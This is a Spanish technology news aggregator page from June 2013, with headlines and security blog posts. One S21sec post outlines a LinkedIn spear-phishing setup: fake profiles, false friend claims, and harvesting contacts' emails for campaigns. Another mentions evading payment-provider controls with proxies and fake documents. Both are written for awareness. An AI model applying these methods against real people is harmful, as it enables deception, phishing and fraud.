ACTUALIDAD en INTERNET


Últimas noticias de deportes publicadas en una selección de prestigiosos medios. La actualidad en Internet de un vistazo.

El Supremo avala que la Administración pueda cerrar webs

Considera que no va contra la libertad de expresión "siempre que se respeten las garantías constitucional y legalmente establecidas".



Publicada el 20 June 2013 | Thu, 20 Jun 2013 08:28:29 -0400

Libros gratuitos de historia del arte en Internet (WWWhat's new)

En freetech4teachers.com divulgan hoy un enlace al Museo Metropolitano de Arte con 372 libros de historia del arte disponibles de forma gratuita en Internet. Este famoso museo de Nueva York incluye un buscador que permite encontrar piezas entre las más de 300.000 que se encuentran en su base de datos, teniendo un material digitalizado excelente [...]

Fuente : WWWhat's new

Temas : BASE, Museos, Tecnología, Web 2

Publicada el 20 June 2013 | Thu, 20 Jun 2013 08:00:07 -0400

Movistar se lanza a los servicios Web con: “Presencia en Internet” (ADSL Ayuda.com)

Desde el 1 de junio está disponible para clientes de FTTH y ADSL, además de PYMEs y autónomos que ya lo disfrutaban, la opción de contratar 'Presencia en Internet' que en junio ya va estar disponible para residentes. Este contrato ofrece varios servicios (Tu Web, Tu Tienda en Internet y Te Destaco...

Fuente : ADSL Ayuda.com

Temas : ADSL, Lanza, Movistar, Tecnología

Publicada el 20 June 2013 | Thu, 20 Jun 2013 07:12:22 -0400

"El infierno son los otros", una web para evitar encontrarte con los amigos

La web Hell is Other People, traducción en ingles de la famosa frase de Sartre, localiza a tus amigos para no encontrártelos por casualidad.



Publicada el 20 June 2013 | Thu, 20 Jun 2013 07:05:04 -0400

El lucrativo negocio del Internet de las cosas (ReadWriteWeb España)

Internet de las cosas o, lo que es lo mismo, la tendencia de que cada vez más dispositivos de todo tipo estén conectados a Internet (tendencia que se está acelerando con el auge de los sensores y las tecnologías de las ciudades inteligentes), generará al sector privado unos beneficios de 613.000 millones de dólares en 2013 , según los últimos datos que aporta la compañía de...

Fuente : ReadWriteWeb España

Temas : Sociedad, Tecnología, Telecomunicaciones

Publicada el 20 June 2013 | Thu, 20 Jun 2013 06:57:26 -0400

Megaupload, LeaseWeb y “la mayor masacre de datos en la historia de Internet” (SiliconWeek)

Tras la decisión de LeaseWeb de vaciar el contenido de 630 servidores con archivos de antiguos usuarios de Megaupload, Kim Dotcom ha mostrado su indignación vía Twitter. The post Megaupload, LeaseWeb y “la mayor masacre de datos en la historia de Internet” appeared first on SiliconWeek .

Fuente : SiliconWeek

Temas : Megaupload, Servicios internet, Tecnología

Publicada el 20 June 2013 | Thu, 20 Jun 2013 06:47:56 -0400

Economía/Empresas.- El 98% de las empresas de más de 10 empleados dispone de conexión a Internet (elEconomista Economía)

El 71,6% de ellas administra una página web propia MADRID, 20 (EUROPA PRESS)

Fuente : elEconomista Economía

Temas : Economía, Tecnología

Publicada el 20 June 2013 | Thu, 20 Jun 2013 06:24:39 -0400

El 90,1% de las empresas interactuó por internet con las administraciones públicas en 2012 (elEconomista Economía)

- Un 29 % de las empresas usa las redes sociales para fines profesionales

Fuente : elEconomista Economía

Temas : Economía, Redes Sociales, Tecnología

Publicada el 20 June 2013 | Thu, 20 Jun 2013 06:20:00 -0400

XBox One permitirá el intercambio de juegos y no hará falta conectarla a Internet cada 24h (Noticias Valencia)

Durante la celebración del E3 , en el que Microsoft y Sony presentaron sus nuevas propuestas en videoconsolas para este año, hubo un claro vencedor. PlayStation 4 , por su precio, sus características y sus juegos pasó de largo a XBox One , que costará 100€ más y estaba restringida a conectarse a Internet cada día para poder funcionar y además, había capado de esta manera el mercado de...

Fuente : Noticias Valencia

Temas : Consolas, Juegos de video, Microsoft XBOX, Tecnología, Valencia

Publicada el 20 June 2013 | Thu, 20 Jun 2013 06:00:53 -0400

Megaupload y la mayor masacre de datos de la historia de Internet (PUBLICO.es)

La empresa LeaseWeb borra los datos de 690 servidores del portal de descargas, que incluyen millones de archivos de usuarios y documentos personales de su propietario que, asegura, son evidencias para su defensa El informático alemán Kim Dotcom sugirió hoy que la eliminación de millones de archivos de su clausurado portal Megaupload beneficia a las autoridades estadounidenses en el proceso de...

Fuente : PUBLICO.es

Temas : Megaupload, Servicios internet, Tecnología

Publicada el 20 June 2013 | Thu, 20 Jun 2013 06:00:00 -0400

Nuevos dominios para navegar en Internet (MKeficaz)

La familia crece. Durante casi dos décadas en el organismo que regula la presencia en Internet, ICANN ( Internet Corporation for Assigned Names and Numbers ) residían unas pocas dinastías, los .com, .net, .org pero poco a poco han …

Fuente : MKeficaz

Temas : Tecnología

Publicada el 20 June 2013 | Thu, 20 Jun 2013 05:54:16 -0400

Adblock Plus llega por fin a Internet Explorer (ONSoftware)

La famosísima extensión gratuita Adbluck Plus aterriza en Internet Explorer . Eso sí, en versión beta de momento. Adblock Plus es un plug-in de filtrado de contenido que permite al usuario crear filtros para bloquear la publicidad de las páginas web . Basta con activar la opción "ABP - Bloquear imagen" en el menú contextual sobre una publicidad, para que nunca más se cargue. También puedes...

Fuente : ONSoftware

Temas : Google, Google Android, Internet Explorer, Software, Tecnología

Publicada el 20 June 2013 | Thu, 20 Jun 2013 05:33:20 -0400

Discos Gong echa el cierre por la bajada de ventas a causa de Internet (La Vanguardia.es- Cultura)

Barcelona. (EUROPA PRESS). - Los dos establecimientos de Discos Gong de Barcelona y Sabadell empiezan este viernes el proceso de liquidación para iniciar el cierre de la empresa, provocado por la "bajada dramática" de las ventas por el consumo de discos y películas a...

Fuente : La Vanguardia.es- Cultura

Temas : Cultura, Tecnología

Publicada el 20 June 2013 | Thu, 20 Jun 2013 05:33:00 -0400

El ‘Internet de Todas las Cosas’ moverá 613.000 millones de dólares este año (SiliconWeek)

Un informe de Cisco evidencia el crecimiento de esta interconexión entre personas, objetos, procesos y datos, donde países como Estados Unidos, China y Alemania parecen llevar la delantera. The post El ‘Internet de Todas las Cosas’ moverá 613.000 millones de dólares este año appeared first on SiliconWeek .

Fuente : SiliconWeek

Temas : Tecnología

Publicada el 20 June 2013 | Thu, 20 Jun 2013 05:04:25 -0400

La contraseña para compartir internet en iOS no es segura. (iPhone World)

Probablemente después de leer este artículo más de uno cambiará la contraseña que aparece por defecto en un dispositivo iOS con el que se quiera compartir la conexión a internet vía WiFi. La opción de compartir internet (tethering) , para los que no lo sepan, es la que aparece en cuarto lugar en el menú Ajustes, esta opción te permite conectar otro dispositivo sin acceso a...

Fuente : iPhone World

Temas : Apple, iOS, iPhone, Tecnología

Publicada el 20 June 2013 | Thu, 20 Jun 2013 04:23:00 -0400

Compartir internet en iOS: peligroso si no cambias la contraseña (Planeta Red)

La verdad es que todos estos días hemos estado hablando largo y tendido del mundo Apple con iPhone e iPad y todas las novedades del sistema operativo iOS 7 . Sin embargo, antes de todas estas noticias, en el mercado tenemos el actual sistema operativo iOS, y en este caso hablamos de las función exclusiva que ofrece Apple en sus terminales móviles de compartir internet en iOS , porque...

Fuente : Planeta Red

Temas : Apple, iOS, iPhone, Tecnología

Publicada el 20 June 2013 | Thu, 20 Jun 2013 04:00:52 -0400

‘Por qué mi empresa tiene que estar en internet’ (Castilla y León Económica)

Inicio: 25/06/2013 Inicio: 25/06/2013 En la Casa de Cultura de Arroyo de la Encomienda (C/ Zarza, 2 Arroyo de la Encomienda, Valladolid) Organizn Afiecyl y la Concejalía de Economía y Empleo del Ayuntamiento de Arroyo de la Encomienda (Valladolid) 25 de junio a las 19,15 horas

Fuente : Castilla y León Económica

Temas : Arroyo de la Encomienda, Ciudades de Valladolid, Tecnología, Valladolid

Publicada el 20 June 2013 | Thu, 20 Jun 2013 03:40:15 -0400

Microsoft retrocede: se podrá jugar en Xbox One sin conexión a internet – Xbox One (Juegos db)

Buenas noticias para el mundo de los videojuegos a nivel usuario. La presión y la crítica de ellos y prensa finalmente ha podido con Microsoft, o quizá ha sido el miedo por el populismo mostrado por Sony con su PS4. Don Mattrick, presidente de Microsoft Interactive Entertainement, ha emitido un comunicado en la web oficial [...]

Fuente : Juegos db

Temas : Blogs de videojuegos, Consolas, Juegos de video, Microsoft XBOX, Tecnología

Publicada el 20 June 2013 | Thu, 20 Jun 2013 03:36:18 -0400

Google lanza el códec de vídeo V9 para intentar reducir los costes de Youtube

Intentará que se adopte este nuevo formato como el estándar de vídeo para internet, que reduciría a la mitad el ancho de banda que necesita Youtube.



Publicada el 20 June 2013 | Thu, 20 Jun 2013 02:26:35 -0400

The Industrial Internet – Pushing the Boundaries of Minds and Machines: A European Perspective (General Electric) (Dokumentalistas)

Fecha de publicación: Junio de 2013 El informe señala que un Internet industrial (Industrial Internet) podría sumar 2,2 trillones de euros al PIB europeo en 2030, estimulando la productividad y espoleando la expansión económica. Simplemente con un incremento del 1% en la eficiencia de sectores como la sanidad, la aviación, el transporte y la energía se … Continuar leyendo » La...

Fuente : Dokumentalistas

Temas : Tecnología

Publicada el 20 June 2013 | Thu, 20 Jun 2013 02:00:09 -0400

Xbox One permitirá jugar sin conexión a internet y juegos de segunda mano (Rtve.es)

Microsoft anunció en su presentación que requeriría conexión continua El éxito de PS4 ha obligado a replantear la estrategia a la compañía El principal factor diferenciador es el precio ahora, la Xbox One 100 € más Leer la noticia completa

Fuente : Rtve.es

Temas : Consolas, Juegos de video, Microsoft, Microsoft XBOX, Tecnología

Publicada el 19 June 2013 | Wed, 19 Jun 2013 22:40:00 -0400

Averiguar la contraseña que genera iOS para Compartir Internet es posible y fácil (Applesfera)

Descubrir la clave de acceso a la red wifi que podemos crear desde nuestro iPhone, para compartir la conexión de datos, no sólo es posible sino que además es extremadamente fácil. Tal y como han demostrado un grupo de investigadores, hacerlo les llevaría sólo 50 segundos. ¿Cómo? Pues fácil, descubriendo el patrón usado para generar la contraseña. Si habéis usado la opción de Compartir...

Fuente : Applesfera

Temas : Apple, iOS, iPhone, Tecnología

Publicada el 19 June 2013 | Wed, 19 Jun 2013 19:01:57 -0400

Microsoft cambia de opinión con respecto al DRM en la Xbox One y el requerimiento de una conexión a internet (Engadget Spanish)

Las quejas con respecto a las restricciones que Microsoft estaba dispuesta a imponer con el intercambio de juegos de la Xbox One no se hicieron esperar, pero la compañía dice estar escuchando a los usuarios y por eso ha decidido implantar algunos cambios en su política. Por ejemplo, ya no será requerido tener una conexión a internet para jugar en la próxima consola, aparte de en un inicio,...

Fuente : Engadget Spanish

Temas : Consolas, Microsoft, Microsoft XBOX, Tecnología

Publicada el 19 June 2013 | Wed, 19 Jun 2013 17:11:17 -0400

¿Tiene el Gobierno de EEUU "acceso directo" a Facebook y Google?

La filtración sobre el programa PRISM aseguraba que la NSA podía acceder de forma directa a nuestros datos guardados por las empresas de internet.



Publicada el 19 June 2013 | Wed, 19 Jun 2013 15:17:40 -0400

Estado y desafíos del sector teleco en España y Europa

Por causas de fuerza mayor me he caído de la mesa redonda que hoy organizaba Xataka “España país conectado, país desconectado“, pero viendo el resultado creo que es lo mejor que podría haberle pasado contando con Julio Alonso como moderador. Os dejo el vídeo del debate que creo que recoge el estado y algunos de [...]

La entrada Estado y desafíos del sector teleco en España y Europa aparece primero en Error 500.

historias relacionadas



Publicada el 19 June 2013 | Wed, 19 Jun 2013 14:37:40 -0400

Investigan cómo lograr los efectos del bypass gástrico sin necesidad de cirugía

Los investigadores analizan el comportamiento de las células nerviosas en el proceso de adelgazamiento.



Publicada el 19 June 2013 | Wed, 19 Jun 2013 13:26:07 -0400

HTC amplía su gama Desire con el nuevo HTC Desire 200

Procesador Snapdragon S1, pantalla de 3,5 pulgadas, cámara de 5 megapíxeles y apenas 100 gramos de peso



Publicada el 19 June 2013 | Wed, 19 Jun 2013 11:05:36 -0400

El Gobierno espera una cobertura "importante" de 4G a final de año

El secretario de Estado de Telecomunicaciones ha destacado las ventajas que esta nueva red ofrecerá a España.



Publicada el 19 June 2013 | Wed, 19 Jun 2013 10:13:58 -0400

¿ Qué puede hacer LinkedIn por ti ?

A día de hoy es habitual leer acerca de Phishing, Spear Phishing, Spam, Web 2.0 y mezclas de varios de ellos para llegar a usuarios finales, los cuales suelen ser el punto más débil desde el punto de vista de la seguridad.

También es ya habitual ver cómo las redes sociales son el punto de partida para muchos tipos de ataques, o por lo menos un punto por el que la información suele pasar, ya sea como punto de partida, o de recepción de la información.

Por lo que intentemos reproducir uno de estos escenarios que a día de hoy se está utilizando, para intentar ver en la medida de lo posible el grado de concienciación que vamos a encontrar y qué resultados podría obtener un potencial atacante.

¿ Definición del punto inicial de ataque ?

Para empezar podríamos crear un perfil falso en LinkedIn, con un aspecto generalista, pero mínimamente enfocado a un tipo concreto de objetivos. Es importante escoger bien al inicio la imagen, el idioma, el último trabajo, los certificados o estudios y las habilidades. Estos puntos básicos harán que los primeros contactos que solicitemos ignoren la solicitud o no. Posteriormente los perfiles de los contactos que se vayan teniendo acabarán por dar credibilidad en mayor o menor medida a nuestro propio perfil.

Aunque la API de linkedin ofrece ciertas posibilidades para automatizar la solicitud de contactos, tiene sus limitaciones para evitar su abuso, por lo que aunque enviar invitaciones manualmente sea más costoso, permite controlar mejor los objetivos a los que se les envía inicialmente las invitaciones.

Podemos centrarnos en dos perfiles básicos, uno para ampliar los posibles objetivos alcanzables (contactos de 2nd nivel, Recruiters o perfiles de RRHH), y otro con objetivos concretos, ya sea por sector (Defensa/Tecnología), empresa (Partners gubernamentales), o persona individual (Militar/CEO/Manager), por acotar en cierta medida a modo de ejemplo un tipo de objetivo como podría ser cualquier otro.

Datos numéricos de aceptación.

Vamos a partir de un total de 114 invitaciones enviadas en todos los casos diciendo ser “amigos” de los destinos de las invitaciones, donde en el 100% de los casos es falso.




Antes de empezar a analizar como se podría llegar hasta este tipo de perfiles, veamos como están distribuidos.



Posibles vías de contacto masivo para envío de contenido malicioso.



A la hora de definir como vamos a ponernos en contacto con las victimas potenciales disponemos de varias alternativas que pueden hacer el mensaje más o menos creíble:
  • Mensajería interna de LinkedIn



    • Funcionalidad de compartir información de forma interna con nuestros contactos (o de modo global).


    • Exportar la lista de contactos, extraer los correos electrónicos y utilizar cualquier framework de Ingeniería Social para realizar una campaña de Spear Phishing tradicional.

    En este punto lo importante mas que el medio, es la credibilidad de lo que se ofrezca (material o inmaterial), así como la credibilidad visual del mensaje.

    Evidentemente el grado de éxito no solo dependerá de nuestro trabajo, también de la predisposición de las victimas potenciales a aceptar lo que se le envie, aunque no hemos de infravalorar a los usuarios finales, la experiencia nos dice que actualmente es el eslabón más débil en una infraestructura tecnológica.

    Conociendo que en todo el ciclo de vida de un perfil de LinkedIn el número máximo de invitaciones que se pueden enviar está establecido en 3.000 y no garantizan que tras previa solicitud este número de forma individual lo vayan a aumentar (y tras analizar el uso que se le daría en este caso, menos), realizar un total de 3000 invitaciones parece un rango suficiente para poder llevar a cabo un ataque bastante amplio.

    Curiosidades del proceso.

    Solo un usuario de 114 contactados solicitó información previa, antes de aceptar (en este caso de ignorar) la invitación inicial, lo cual es la opción correcta.

    Una vez alcanzado el medio centenar de contactos, dejó de ser necesario enviar invitaciones, el simple hecho de visitar perfiles hacía de reclamo para que visitaran nuestro perfil y así generar de forma indirecta que se nos solicitara ser uno de sus contactos.

    Superado el centenar de contactos, se reciben ofertas de trabajo en empresas de reputación contrastada.



    Eugenio Delfa
    Advanced CyberSecurity Services S21sec




    Publicada el 19 June 2013 | Wed, 19 Jun 2013 03:47:00 -0400

    La industria del videojuego hacia la cultura del acceso

    En el E3 tuve la oportunidad de conversar con el vicepresidente ejecutivo de Xbox, Chris Lewis, y de ahí salió esta entrevista que publico en Xataka. Hablamos de varios temas, pero los comentarios inevitablemente a algo que le planteamos de forma directa: las restricciones que Microsoft impone con la Xbox One, la obligación de conexión [...]

    La entrada La industria del videojuego hacia la cultura del acceso aparece primero en Error 500.

    historias relacionadas



    Publicada el 18 June 2013 | Tue, 18 Jun 2013 13:02:06 -0400

    Surface RT a 199 dólares para colegios y universidades

    Microsoft venderá su tableta a precio especial a las instituciones educativas hasta el 31 de agosto.



    Publicada el 18 June 2013 | Tue, 18 Jun 2013 10:12:18 -0400

    ¿Por qué nos llegan las mejores ideas justo antes de dormir?

    Barry Gordon, profesor de Neurología y Ciencia Cognitiva de la Universidad John Hopkins, explica la razón.



    Publicada el 18 June 2013 | Tue, 18 Jun 2013 10:00:19 -0400

    Un robot que corre como un gato

    Gracias a sus patas, cuyo diseño reproduce la morfología felina, Cheetah-cub tiene las mismas ventajas que su modelo: es pequeño, ligero y rápido.



    Publicada el 18 June 2013 | Tue, 18 Jun 2013 08:38:09 -0400

    China vuelve a tener el superordenador más rápido del mundo

    El país asiático ya ostentó el galardón en noviembre de 2010 con el superordenador Tinhae-1A y ahora repite con su sucesor Tinhae-2.



    Publicada el 18 June 2013 | Tue, 18 Jun 2013 08:37:17 -0400

    ¿Por qué murió Yuri Gagarin?

    El primer astronauta de la historia falleció en un accidente de aviación causado por una maniobra imprudente de otro piloto.



    Publicada el 17 June 2013 | Mon, 17 Jun 2013 17:57:23 -0400

    Es tiempo de Disconnect (que recibe inversión)

    En pleno escándalo sobre la privacidad con PRISM, contrapunto con la noticia de que Disconnect (del que hablamos por aquí no hace demasiado) recibe inversión de 3.5 millones de dólares. Afirman tener un millón de usuarios activos semanales, con todo lo que se está sabiendo creo que su valor de “navegar sin que me sigan” [...]

    La entrada Es tiempo de Disconnect (que recibe inversión) aparece primero en Error 500.

    historias relacionadas



    Publicada el 17 June 2013 | Mon, 17 Jun 2013 17:24:32 -0400

    Mis dudas sobre esas simpáticas consolas Android

    En “La generación de consolas low cost con Android en busca de su público” comento los modelos (algunos que he probado y otros) y planteamiento de la nueva oleada de dispositivos para el entretenimiento en el salón que viene con dos armas: el bajo precio y Android como sistema operativo. El análisis no puede sino [...]

    La entrada Mis dudas sobre esas simpáticas consolas Android aparece primero en Error 500.

    historias relacionadas



    Publicada el 17 June 2013 | Mon, 17 Jun 2013 17:06:14 -0400

    OrCam, las gafas que leen en voz alta

    Diseñadas para discapacitados visuales, los usuarios obtienen la información marcando con su dedo el texto y un pequeño ordenador lo lee por él.



    Publicada el 17 June 2013 | Mon, 17 Jun 2013 15:57:32 -0400

    Ganan dos millones al año por los derechos del 'Cumpleaños feliz'

    Warner tiene los derechos de la canción de 1893 Good Morning to All, cuya melodía se usa para desear un cumpleaños feliz en muchos países.



    Publicada el 17 June 2013 | Mon, 17 Jun 2013 15:35:50 -0400

    Los secretos de la industria del spam

    Cada año España escala más posiciones en el envío y recepción de correo basura: estamos en el top ten de una industria millonaria.



    Publicada el 17 June 2013 | Mon, 17 Jun 2013 14:28:01 -0400

    La vida sin Liberty Reserve


    Están siendo unos días más bien revueltos en el mundo underground, hace un par de semanas los ciberdelicuentes se despertaban con su querido Lyberty Reserve (LR) cerrado y sus administradores detenidos por la policía española en Barajas.  Os podéis imaginar la reacción de los carders, spammers, botmaster y phishers al ver esfumarse de golpe los fondos que con tanto esfuerzo habían almacenado en este proveedor de pagos, de moral más bien relajada. 

    Esta operación, junto con el desmantelamiento del bullet-proof ISP McColo en 2008, probablemente ha sido el golpe más importante hasta la fecha contra el ecosistema de la delincuencia online. A fin de cuentas cuando la policía detiene una banda, siempre hay otra deseando ocupar su lugar; y si la industria de seguridad desmantela una botnet, en pocos meses aparece otra nueva. Sin embargo la desaparición de LR ha sido algo distinto y el vacío que deja, no es en absoluto fácil de rellenar 

    Lyberty Reserve no se limitaba a transferir dinero, como los archiconocidos Western Union o Money Gram. También operaba como un banco anónimo  en el que muchos ciberdelincuentes  almacenaban sus ganancias ilícitas y lo utilizaban como punto de partida para blanquearlas. Parece claro que después de este cierre, aunque apareciese un nuevo actor con medios suficientes para montar una infraestructura estable y segura, le sería muy difícil ganar la confianza del público.

    Aunque  en algún foro existen propuestas para replicar la estructura de LR en servidores de Corea del Norte o Irán, lo cierto es que ahora mismo en la mayoría de foros under está  abierta la discusión respecto a qué moneda virtual es la más adecuada para sustituir al defenestrado LR. Como no podía ser de otra forma, Bitcoin, está en boca de todos, y de hecho es habitual en los foros y tiendas TOR dedicadas a venta de drogas y precursores. Sin embargo la criptomoneda no convence a muchos ciberdelincuentes como medio de pago y colchón para los ahorros. Y para ello emplean los mismos argumentos que aparecen en cualquier discusión sobre Bitcoin, (volatilidad del cambio, posibilidad de que sea un Esquema Ponzi, ausencia de una entidad que lo respalde...). 
    Finalmente todo apunta a que el ganador de la situación va a ser nuestro viejo amigo Webmoney. Este proveedor conocido popularmente como "la alternativa rusa a Paypal" posee numerosas ventajas: 
    • Una infraestructura mayor que la de LR 
    • Fuerte implantación en países del este, donde incluso pueden adquirirse fondos mediante tarjetas prepago 
    • Recientemente ha añadido Bitcoin a la lista de divisas que acepta. Lo cual facilita realizar saltos entre sistemas monetarios, tan útiles cuando de se trata de blanquear dinero.
    • Y por supuesto, los parabienes de la administración rusa. Que alejan el fantasma de un cierre repentino.

    En su contra, tiene la relativa dificultad de abrir cuentas anónimas fuera de países del este y que recientemente han prohibido la apertura de nuevas cuentas a ciudadanos americanos para evitar problemas con el FBI. En resumen nada que no pueda evitarse usando proxys, documentación falsa y otro trucos disponibles a un click de  distancia.

    Javier Barrios 
    S21sec ecrime


    Publicada el 17 June 2013 | Mon, 17 Jun 2013 12:01:00 -0400

    La pregunta sobre el modelo de negocio ¿es la pregunta equivocada?

    Es lo que afirma Josh Elman que, tras pasar por Linkedin, Twitter y Facebook, vuelve sobre la tesis de que este tipo de plataformas se tienen que preocupar de escalar, aumentar la interacción de los usuarios y hacer sostenible la adopción del comportamiento que definen. Cita a Ev Williams en Quora, que sostiene que Tener [...]

    La entrada La pregunta sobre el modelo de negocio ¿es la pregunta equivocada? aparece primero en Error 500.

    historias relacionadas



    Publicada el 17 June 2013 | Mon, 17 Jun 2013 09:50:02 -0400

    La lucha de la universidad contra las pseudociencias y las 'terapias naturales'

    Tras años de asedio, la movilización de muchos profesores está consiguiendo las primeras victorias frente a la invasión de las pseudociencias.



    Publicada el 17 June 2013 | Mon, 17 Jun 2013 09:02:34 -0400

    Apple entregó datos de 5.000 personas a EEUU

    La compañía ha reconocido en un comunicado que el Gobierno estadounidense le requirió información sobre 5.000 de sus usuarios, que entregó.



    Publicada el 17 June 2013 | Mon, 17 Jun 2013 07:54:17 -0400

    El “no éxito todavía” de Wii U

    Este E3 era el de la guerra entre Microsoft y Sony y servidor se ha ido a entrevistar a… Nintendo. Hemos publicado la conversación con Nicolás Wegnez en Vidaextr, en ella damos un repaso a la situación de Wii U, sus ventas y como se reconfigura el sector con los anuncios de Xbox One y [...]

    La entrada El “no éxito todavía” de Wii U aparece primero en Error 500.

    historias relacionadas



    Publicada el 17 June 2013 | Mon, 17 Jun 2013 05:32:06 -0400

    Libros de texto electrónicos para reducir el precio de la educación

    Un grupo de profesores ha editado varios libros de Primero y Segundo de ESO para evitar que los padres compren cada año nuevos ejemplares.



    Publicada el 16 June 2013 | Sun, 16 Jun 2013 10:00:50 -0400

    La Rabia, bajo control

    Publicada el 16 June 2013 | Sun, 16 Jun 2013 08:58:19 -0400

    Tres híbridos entre tableta y portátil con Windows 8

    Estos convertibles son el gadget ideal para viajar, porque son un dos en uno.



    Publicada el 16 June 2013 | Sun, 16 Jun 2013 04:20:19 -0400

    La semana en los blogs CCLXXXIX

    Es posible que la semana en los blogs acabe llamándose “el mes en los blogs”, pero en todo caso no quiero perder esta buena costumbre de enlazar y compartir buenos artículos en castellano. Ahí van mientras recupero a The Postal Service: Cierra JobLinker. Reflexiones y aprendizajes de Iván de Benito. A la caza del oro [...]

    La entrada La semana en los blogs CCLXXXIX aparece primero en Error 500.

    historias relacionadas



    Publicada el 16 June 2013 | Sun, 16 Jun 2013 03:18:01 -0400

    'The Last of Us', más que una joya

    Llega a PlayStation 3 el juego que ha recibido más de 30 puntuaciones perfectas en distintas publicaciones especializadas.



    Publicada el 15 June 2013 | Sat, 15 Jun 2013 04:41:44 -0400

    Kickstarter, proyectos fracasados y fraudes

    En Quartz, Kickstarter evitó por poco lo que hubiera sido el mayor fraude en la historia del sitio de crowdfunding. Se trata dell proyecto Kobe Red, que se comprometió a entregar carne de vacas japonesas alimentadas con piensos ecológicos 100 % y tratadas con cerveza y masajes, sólo una hora antes de que los estafadores [...]

    La entrada Kickstarter, proyectos fracasados y fraudes aparece primero en Error 500.

    historias relacionadas



    Publicada el 15 June 2013 | Sat, 15 Jun 2013 03:29:10 -0400

    Tres investigadores de Oxford piden ser congelados al morir para poder resucitar en el futuro

    Dos de ellos sólo congelarían sus cabezas y el tercero el cuerpo entero.



    Publicada el 14 June 2013 | Fri, 14 Jun 2013 12:58:32 -0400

    El Tribunal Supremo de EEUU prohíbe patentar genes humanos

    El fallo abaratará pruebas genéticas como la que llevó a Angelina Jolie a hacerse una mastectomía, aunque puede desincentivar la investigación.



    Publicada el 14 June 2013 | Fri, 14 Jun 2013 12:32:38 -0400

    4g en España, quien da primero… ¿da dos veces?

    En Xataka publican las primeras impresiones con el 4G de Vodafone primera teleco en comercializar la nueva generación de redes. Los números de velocidad de descarga y de subida son de poner los dientes largos, aunque hay que tomarlos con la salvedad de la escasísima adopción actual, acaban de empezar. En los últimos meses hemos [...]

    La entrada 4g en España, quien da primero… ¿da dos veces? aparece primero en Error 500.



    Publicada el 14 June 2013 | Fri, 14 Jun 2013 12:16:59 -0400

    El modelo actual del cine no es sostenible por el cambio tecnológico

    Algo que comentan unos chavales llamados Lucas y Spielberg: Las películas están compitiendo con todo el contenido y opciones que ofrece Internet. Con Netflix produciendo contenidos de alta calidad y con los videojuegos compitiendo en lso fines de semana, queda poco hueco para que la cita de la noche sea ir al cine. Se está [...]

    La entrada El modelo actual del cine no es sostenible por el cambio tecnológico aparece primero en Error 500.

    historias relacionadas



    Publicada el 14 June 2013 | Fri, 14 Jun 2013 05:01:34 -0400

    Upstart, crowdfunding para pagar los estudios superiores

    Acabo de descubrir UpStart, una mezcla de Kickstarter y Linkedin en la que jóvenes que quieren estudiar ofrecen su candidatura a inversores a cambio de una pequeña parte de sus ingresos futuros. En The Economist tienen más información sobre Upstart: lo están utilizando muchos alumnos de países emergentes, se suele acordar una rentabilidad de entre [...]

    La entrada Upstart, crowdfunding para pagar los estudios superiores aparece primero en Error 500.

    historias relacionadas



    Publicada el 14 June 2013 | Fri, 14 Jun 2013 03:31:37 -0400

    Oculus Rift, mi estrella del E3

    Lo explico en Oculus Rift, la realidad virtual ha vuelto (primeras impresiones), para mi la estrella de este E3 no ha sido la nueva generación de consolas sino un proyecto cuyo prototipo he podido probar apenas media hora y que me ha dejado impresionado.

    La entrada Oculus Rift, mi estrella del E3 aparece primero en Error 500.

    historias relacionadas



    Publicada el 13 June 2013 | Thu, 13 Jun 2013 16:23:53 -0400

    Lecciones aprendidas Ciberejercicio Tabletop TTX España

    El pasado 6 de mayo participamos en el primer Ciberejercicio Table Top TTX en España organizado por el CSFI (Cyber Security Forum Iniatitive) e ISDEFE.  

    El objetivo principal de este ejercicio fue identificar las cibervulnerabilidades a las que se enfrentan las infraestructuras críticas e identificar los fallos operativos con el fin de elaborar un documento con las mejores estrategias para la mitigación de los fallos de ciberseguridad. 

    En un primer ejercicio se realizó una simulación de ciberataque para analizar las consecuencias de la interrupción de las comunicaciones, mientras que en un segundo ejercicio se analizaron los daños que puede ocasionar un ciberataque en una compañía de producción y distribución de gas cuyas intalaciones han sido catalogadas como infraestructura crítica.

    Ya están disponibles las conclusiones obtenidas a raíz de la realización de los ejercicios en la página web del CSFI.

    Dpto. Marketing S21sec



    Publicada el 12 June 2013 | Wed, 12 Jun 2013 11:23:00 -0400

    Una vieja nueva generación de consolas

    Anda uno en Los Ángeles atendiendo por primera vez en su vida a la gran feria del sector, el e3Expo en una edición especial: la de la puesta de largo de la generación de consolas. Aunque el debate se ha centrado mucho en la guerra del precio y del control del juego usado, en Xataka [...]

    La entrada Una vieja nueva generación de consolas aparece primero en Error 500.

    historias relacionadas



    Publicada el 12 June 2013 | Wed, 12 Jun 2013 10:29:25 -0400

    Waze a manos de Google

    Ya es oficial la compra de Waze por parte de Google. Una compra que no acabo de ver demasiado, quizás porque hace años que no uso Waze: Google ya es el gran dominador en los mapas y navegación con el móvil e incoporar tiempo real y capa social no debería ser tan costoso como esta [...]

    La entrada Waze a manos de Google aparece primero en Error 500.

    historias relacionadas



    Publicada el 11 June 2013 | Tue, 11 Jun 2013 17:04:52 -0400

    Digamos cien mil palabras sobre los nuevos iconos de iOS 7

    He seguido con distancia la WWDC 2013 de Apple, vía Twitter y los primeros artículos que han ido apareciendo. Con la prudencia a la que obliga esto, tengo la sensación de que se confirma una impresión personal acrecentada con el nombramiento de Ive: la consolidación de un cierto tipo de discurso cada vez más dominante [...]

    La entrada Digamos cien mil palabras sobre los nuevos iconos de iOS 7 aparece primero en Error 500.

    historias relacionadas



    Publicada el 11 June 2013 | Tue, 11 Jun 2013 03:00:23 -0400

    Puedes tener internet o puedes tener privacidad. No los dos

    “You can have privacy, or you can have the Internet. You can’t have both”. Es una cita que acabo de ver en Twitter y que atribuyen a un artículo de opinión del New York Times que no he encontrado en su página. Me resulta pesimista y algo maniquea (en la privacidad hay grados y se [...]

    La entrada Puedes tener internet o puedes tener privacidad. No los dos aparece primero en Error 500.

    historias relacionadas



    Publicada el 9 June 2013 | Sun, 09 Jun 2013 23:36:20 -0400

    La experiencia con Firefox Os

    Llevo una semana probando un móvil Firefox OS – un geeksphone para desarolladores – una experiencia que mi compañero Javier Pastor ha reflejado en un extenso artículo en Xataka: cómo es intentar funcionar con Firefox como único sistema móvil. Mis impresiones son muy parecidas, hay una experiencia que se ha logrado: buen navegador, funcionamiento solventen [...]

    La entrada La experiencia con Firefox Os aparece primero en Error 500.

    historias relacionadas



    Publicada el 8 June 2013 | Sat, 08 Jun 2013 01:12:23 -0400

    Mi caja de herramientas

    “Dame seis horas para cortar un árbol y pasaré las primeras cuatro afilando el hacha.“
    Abraham Lincoln

